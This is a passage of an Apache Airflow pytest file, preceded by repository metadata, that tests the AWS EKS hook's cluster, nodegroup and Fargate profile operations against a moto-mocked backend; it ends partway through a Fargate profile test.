"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23074"
},
{
"name": "Cucumber",
"bytes": "7808"
},
{
"name": "HTML",
"bytes": "121455"
},
{
"name": "Handlebars",
"bytes": "446"
},
{
"name": "JavaScript",
"bytes": "69039"
},
{
"name": "Python",
"bytes": "160654"
},
{
"name": "Ruby",
"bytes": "165"
}
],
"symlink_target": ""
}
|
from __future__ import annotations
import sys
from copy import deepcopy
from datetime import datetime
from pathlib import Path
from unittest import mock
from urllib.parse import ParseResult, urlsplit
import pytest
import yaml
from _pytest._code import ExceptionInfo
from botocore.exceptions import ClientError
from freezegun import freeze_time
from moto import mock_eks
from moto.core import DEFAULT_ACCOUNT_ID
from moto.core.exceptions import AWSError
from moto.eks.exceptions import (
InvalidParameterException,
InvalidRequestException,
ResourceInUseException,
ResourceNotFoundException,
)
from moto.eks.models import (
CLUSTER_EXISTS_MSG,
CLUSTER_IN_USE_MSG,
CLUSTER_NOT_FOUND_MSG,
CLUSTER_NOT_READY_MSG,
FARGATE_PROFILE_EXISTS_MSG,
FARGATE_PROFILE_NEEDS_SELECTOR_MSG,
FARGATE_PROFILE_NOT_FOUND_MSG,
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
FARGATE_PROFILE_TOO_MANY_LABELS,
LAUNCH_TEMPLATE_WITH_DISK_SIZE_MSG,
LAUNCH_TEMPLATE_WITH_REMOTE_ACCESS_MSG,
NODEGROUP_EXISTS_MSG,
NODEGROUP_NOT_FOUND_MSG,
)
from airflow.providers.amazon.aws.hooks.eks import EksHook
from ..utils.eks_test_constants import (
DEFAULT_CONN_ID,
DEFAULT_NAMESPACE,
DISK_SIZE,
FROZEN_TIME,
INSTANCE_TYPES,
LAUNCH_TEMPLATE,
MAX_FARGATE_LABELS,
NODEGROUP_OWNERSHIP_TAG_DEFAULT_VALUE,
NODEGROUP_OWNERSHIP_TAG_KEY,
NON_EXISTING_CLUSTER_NAME,
NON_EXISTING_FARGATE_PROFILE_NAME,
NON_EXISTING_NODEGROUP_NAME,
PARTITION,
POD_EXECUTION_ROLE_ARN,
REGION,
REMOTE_ACCESS,
BatchCountSize,
ClusterAttributes,
ClusterInputs,
ErrorAttributes,
FargateProfileAttributes,
FargateProfileInputs,
NodegroupAttributes,
NodegroupInputs,
PossibleTestResults,
RegExTemplates,
ResponseAttributes,
)
from ..utils.eks_test_utils import (
attributes_to_test,
generate_clusters,
generate_dict,
generate_fargate_profiles,
generate_nodegroups,
iso_date,
region_matches_partition,
)
@pytest.fixture(scope="function")
def cluster_builder():
"""A fixture to generate a batch of EKS Clusters on the mocked backend for testing."""
class ClusterTestDataFactory:
"""A Factory class for building the Cluster objects."""
def __init__(self, count: int, minimal: bool) -> None:
# Generate 'count' number of Cluster objects.
self.cluster_names: list[str] = generate_clusters(
eks_hook=eks_hook, num_clusters=count, minimal=minimal
)
self.existing_cluster_name: str = self.cluster_names[0]
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_cluster() for the first Cluster.
self.cluster_describe_output: dict = eks_hook.describe_cluster(name=self.existing_cluster_name)[
ResponseAttributes.CLUSTER
]
# Generate a list of the Cluster attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=ClusterInputs, cluster_name=self.existing_cluster_name
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, ClusterTestDataFactory]:
return eks_hook, ClusterTestDataFactory(count=count, minimal=minimal)
mock_eks().start()
eks_hook = EksHook(
aws_conn_id=DEFAULT_CONN_ID,
region_name=REGION,
)
yield _execute
mock_eks().stop()
@pytest.fixture(scope="function")
def fargate_profile_builder(cluster_builder):
"""A fixture to generate a batch of EKS Fargate profiles on the mocked backend for testing."""
class FargateProfileTestDataFactory:
"""A Factory class for building the Fargate profile objects."""
def __init__(self, count: int, minimal: bool) -> None:
self.cluster_name = cluster.existing_cluster_name
# Generate 'count' number of FargateProfile objects.
self.fargate_profile_names = generate_fargate_profiles(
eks_hook=eks_hook,
cluster_name=self.cluster_name,
num_profiles=count,
minimal=minimal,
)
# Get the name of the first generated profile.
self.existing_fargate_profile_name: str = self.fargate_profile_names[0]
self.nonexistent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_fargate_profiles() for the first profile.
self.fargate_describe_output: dict = eks_hook.describe_fargate_profile(
clusterName=self.cluster_name, fargateProfileName=self.existing_fargate_profile_name
)[ResponseAttributes.FARGATE_PROFILE]
# Generate a list of the Fargate Profile attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=FargateProfileInputs,
cluster_name=self.cluster_name,
fargate_profile_name=self.existing_fargate_profile_name,
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, FargateProfileTestDataFactory]:
return eks_hook, FargateProfileTestDataFactory(count=count, minimal=minimal)
eks_hook, cluster = cluster_builder()
return _execute
@pytest.fixture(scope="function")
def nodegroup_builder(cluster_builder):
"""A fixture to generate a batch of EKS Managed Nodegroups on the mocked backend for testing."""
class NodegroupTestDataFactory:
"""A Factory class for building the Nodegroup objects."""
def __init__(self, count: int, minimal: bool) -> None:
self.cluster_name: str = cluster.existing_cluster_name
# Generate 'count' number of Nodegroup objects.
self.nodegroup_names: list[str] = generate_nodegroups(
eks_hook=eks_hook,
cluster_name=self.cluster_name,
num_nodegroups=count,
minimal=minimal,
)
# Get the name of the first generated Nodegroup.
self.existing_nodegroup_name: str = self.nodegroup_names[0]
self.nonexistent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_nodegroup() for the first Nodegroup.
self.nodegroup_describe_output: dict = eks_hook.describe_nodegroup(
clusterName=self.cluster_name, nodegroupName=self.existing_nodegroup_name
)[ResponseAttributes.NODEGROUP]
# Generate a list of the Nodegroup attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=NodegroupInputs,
cluster_name=self.cluster_name,
nodegroup_name=self.existing_nodegroup_name,
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, NodegroupTestDataFactory]:
return eks_hook, NodegroupTestDataFactory(count=count, minimal=minimal)
eks_hook, cluster = cluster_builder()
return _execute
class TestEksHooks:
def test_hook(self, cluster_builder) -> None:
eks_hook, _ = cluster_builder()
assert eks_hook.get_conn() is not None
assert eks_hook.aws_conn_id == DEFAULT_CONN_ID
assert eks_hook.region_name == REGION
###
# This specific test does not use the fixture since
# it is intended to verify that there are no clusters
# in the list at initialization, which means the mock
# decorator must be used manually in this one case.
###
@mock_eks
def test_list_clusters_returns_empty_by_default(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
result: list = eks_hook.list_clusters()
assert isinstance(result, list)
assert len(result) == 0
def test_list_clusters_returns_sorted_cluster_names(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.cluster_names)
result: list = eks_hook.list_clusters()
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_clusters_returns_all_results(
self, cluster_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.cluster_names)
result: list = eks_hook.list_clusters()
assert_result_matches_expected_list(result, expected_result)
def test_create_cluster_throws_exception_when_cluster_exists(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = CLUSTER_EXISTS_MSG.format(
clusterName=generated_test_data.existing_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_cluster(
name=generated_test_data.existing_cluster_name, **dict(ClusterInputs.REQUIRED) # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new cluster was created.
len_after_test: int = len(eks_hook.list_clusters())
assert len_after_test == initial_batch_size
def test_create_cluster_generates_valid_cluster_arn(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_names,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.CLUSTER_ARN,
arn_under_test=generated_test_data.cluster_describe_output[ClusterAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_cluster_generates_valid_cluster_created_timestamp(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_time: datetime = generated_test_data.cluster_describe_output[ClusterAttributes.CREATED_AT]
assert iso_date(result_time) == FROZEN_TIME
def test_create_cluster_generates_valid_cluster_endpoint(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_endpoint: str = generated_test_data.cluster_describe_output[ClusterAttributes.ENDPOINT]
assert_is_valid_uri(result_endpoint)
def test_create_cluster_generates_valid_oidc_identity(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_issuer: str = generated_test_data.cluster_describe_output[ClusterAttributes.IDENTITY][
ClusterAttributes.OIDC
][ClusterAttributes.ISSUER]
assert_is_valid_uri(result_issuer)
def test_create_cluster_saves_provided_parameters(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.cluster_describe_output[key] == expected_value
def test_describe_cluster_throws_exception_when_cluster_not_found(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_cluster(name=generated_test_data.nonexistent_cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_cluster_returns_deleted_cluster(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_cluster(name=generated_test_data.existing_cluster_name)[
ResponseAttributes.CLUSTER
]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_cluster_removes_deleted_cluster(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size, minimal=False)
eks_hook.delete_cluster(name=generated_test_data.existing_cluster_name)
result_cluster_list: list = eks_hook.list_clusters()
assert len(result_cluster_list) == (initial_batch_size - 1)
assert generated_test_data.existing_cluster_name not in result_cluster_list
def test_delete_cluster_throws_exception_when_cluster_not_found(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_cluster(name=generated_test_data.nonexistent_cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify nothing was deleted.
cluster_count_after_test: int = len(eks_hook.list_clusters())
assert cluster_count_after_test == initial_batch_size
def test_list_nodegroups_returns_empty_by_default(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.existing_cluster_name)
assert isinstance(result, list)
assert len(result) == 0
def test_list_nodegroups_returns_sorted_nodegroup_names(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.nodegroup_names)
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_nodegroups_returns_all_results(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.nodegroup_names)
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result)
@mock_eks
def test_create_nodegroup_throws_exception_when_cluster_not_found(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
non_existent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
non_existent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=non_existent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=non_existent_cluster_name,
nodegroupName=non_existent_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_create_nodegroup_throws_exception_when_nodegroup_already_exists(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = NODEGROUP_EXISTS_MSG.format(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new nodegroup was created.
nodegroup_count_after_test = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
def test_create_nodegroup_throws_exception_when_cluster_not_active(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
non_existent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = InvalidRequestException
expected_msg: str = CLUSTER_NOT_READY_MSG.format(
clusterName=generated_test_data.cluster_name,
)
with mock.patch("moto.eks.models.Cluster.isActive", return_value=False):
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=non_existent_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new nodegroup was created.
nodegroup_count_after_test = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
def test_create_nodegroup_generates_valid_nodegroup_arn(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_name,
generated_test_data.nodegroup_names,
None,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.NODEGROUP_ARN,
arn_under_test=generated_test_data.nodegroup_describe_output[NodegroupAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_nodegroup_generates_valid_nodegroup_created_timestamp(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_time: datetime = generated_test_data.nodegroup_describe_output[NodegroupAttributes.CREATED_AT]
assert iso_date(result_time) == FROZEN_TIME
@freeze_time(FROZEN_TIME)
def test_create_nodegroup_generates_valid_nodegroup_modified_timestamp(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_time: datetime = generated_test_data.nodegroup_describe_output[NodegroupAttributes.MODIFIED_AT]
assert iso_date(result_time) == FROZEN_TIME
def test_create_nodegroup_generates_valid_autoscaling_group_name(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_resources: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.RESOURCES]
result_asg_name: str = result_resources[NodegroupAttributes.AUTOSCALING_GROUPS][0][
NodegroupAttributes.NAME
]
assert RegExTemplates.NODEGROUP_ASG_NAME_PATTERN.match(result_asg_name)
def test_create_nodegroup_generates_valid_security_group_name(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_resources: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.RESOURCES]
result_security_group: str = result_resources[NodegroupAttributes.REMOTE_ACCESS_SG]
assert RegExTemplates.NODEGROUP_SECURITY_GROUP_NAME_PATTERN.match(result_security_group)
def test_create_nodegroup_saves_provided_parameters(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.nodegroup_describe_output[key] == expected_value
def test_create_nodegroup_without_tags_uses_default(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
tag_list: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.TAGS]
ownership_tag_key: str = NODEGROUP_OWNERSHIP_TAG_KEY.format(
cluster_name=generated_test_data.cluster_name
)
assert tag_list.get(ownership_tag_key) == NODEGROUP_OWNERSHIP_TAG_DEFAULT_VALUE
def test_create_nodegroup_with_ownership_tag_uses_provided_value(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
cluster_name: str = generated_test_data.existing_cluster_name
ownership_tag_key: str = NODEGROUP_OWNERSHIP_TAG_KEY.format(cluster_name=cluster_name)
provided_tag_value: str = "shared"
created_nodegroup: dict = eks_hook.create_nodegroup(
clusterName=cluster_name,
nodegroupName="nodegroup",
tags={ownership_tag_key: provided_tag_value},
**dict(deepcopy(NodegroupInputs.REQUIRED)),
)[ResponseAttributes.NODEGROUP]
tags = created_nodegroup.get(NodegroupAttributes.TAGS)
assert tags is not None
assert tags.get(ownership_tag_key) == provided_tag_value
def test_describe_nodegroup_throws_exception_when_cluster_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_nodegroup(
clusterName=generated_test_data.nonexistent_cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_describe_nodegroup_throws_exception_when_nodegroup_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = NODEGROUP_NOT_FOUND_MSG.format(
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_cluster_throws_exception_when_nodegroups_exist(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = CLUSTER_IN_USE_MSG
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_cluster(name=generated_test_data.cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no clusters were deleted.
cluster_count_after_test: int = len(eks_hook.list_clusters())
assert cluster_count_after_test == BatchCountSize.SINGLE
def test_delete_nodegroup_removes_deleted_nodegroup(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
result_nodegroup_list: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert len(result_nodegroup_list) == (initial_batch_size - 1)
assert generated_test_data.existing_nodegroup_name not in result_nodegroup_list
def test_delete_nodegroup_returns_deleted_nodegroup(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)[ResponseAttributes.NODEGROUP]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_nodegroup_throws_exception_when_cluster_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_nodegroup(
clusterName=generated_test_data.nonexistent_cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_nodegroup_throws_exception_when_nodegroup_not_found(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = NODEGROUP_NOT_FOUND_MSG.format(
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new nodegroup was created.
nodegroup_count_after_test: int = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
# If launch_template is specified, you can not specify instanceTypes, diskSize, or remoteAccess.
test_cases = [
# Happy Paths
(LAUNCH_TEMPLATE, None, None, None, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, None, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, None, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, DISK_SIZE, None, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, None, None, PossibleTestResults.SUCCESS),
(None, None, DISK_SIZE, None, PossibleTestResults.SUCCESS),
(None, None, None, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, None, None, None, PossibleTestResults.SUCCESS),
# Unhappy Paths
(LAUNCH_TEMPLATE, INSTANCE_TYPES, None, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, DISK_SIZE, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, None, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, DISK_SIZE, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, None, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.FAILURE),
]
@pytest.mark.parametrize(
"launch_template, instance_types, disk_size, remote_access, expected_result",
test_cases,
)
def test_create_nodegroup_handles_launch_template_combinations(
self,
cluster_builder,
launch_template,
instance_types,
disk_size,
remote_access,
expected_result,
):
eks_hook, generated_test_data = cluster_builder()
nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = InvalidParameterException
expected_message: str = ""
test_inputs = dict(
deepcopy(
# Required Constants
NodegroupInputs.REQUIRED
# Required Variables
+ [
(
ClusterAttributes.CLUSTER_NAME,
generated_test_data.existing_cluster_name,
),
(NodegroupAttributes.NODEGROUP_NAME, nodegroup_name),
]
# Test Case Values
+ [_ for _ in [launch_template, instance_types, disk_size, remote_access] if _]
)
)
if expected_result == PossibleTestResults.SUCCESS:
result: dict = eks_hook.create_nodegroup(**test_inputs)[ResponseAttributes.NODEGROUP]
expected_output = deepcopy(test_inputs)
# The Create Nodegroup hook magically adds the required
# cluster/owned tag, so add that to the expected outputs.
expected_output["tags"] = {
f"kubernetes.io/cluster/{generated_test_data.existing_cluster_name}": "owned"
}
for key, expected_value in expected_output.items():
assert result[key] == expected_value
else:
if launch_template and disk_size:
expected_message = LAUNCH_TEMPLATE_WITH_DISK_SIZE_MSG
elif launch_template and remote_access:
expected_message = LAUNCH_TEMPLATE_WITH_REMOTE_ACCESS_MSG
# Docs say this combination throws an exception but testing shows that
# instanceTypes overrides the launchTemplate instance values instead.
# Leaving here for easier correction if/when that gets fixed.
elif launch_template and instance_types:
pass
if expected_message:
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(**test_inputs)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_message,
raised_exception=raised_exception,
)
def test_list_fargate_profiles_returns_empty_by_default(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.existing_cluster_name)
assert isinstance(result, list)
assert len(result) == 0
def test_list_fargate_profiles_returns_sorted_profile_names(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.fargate_profile_names)
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_fargate_profiles_returns_all_results(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.fargate_profile_names)
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result)
@mock_eks
def test_create_fargate_profile_throws_exception_when_cluster_not_found(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
non_existent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
non_existent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(clusterName=non_existent_cluster_name)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=non_existent_cluster_name,
fargateProfileName=non_existent_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_create_fargate_profile_throws_exception_when_fargate_profile_already_exists(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = FARGATE_PROFILE_EXISTS_MSG
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new Fargate profile was created.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
def test_create_fargate_profile_throws_exception_when_cluster_not_active(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
non_existent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = InvalidRequestException
expected_msg: str = CLUSTER_NOT_READY_MSG.format(
clusterName=generated_test_data.cluster_name,
)
with mock.patch("moto.eks.models.Cluster.isActive", return_value=False):
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=non_existent_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new Fargate profile was created.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
def test_create_fargate_profile_generates_valid_profile_arn(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder()
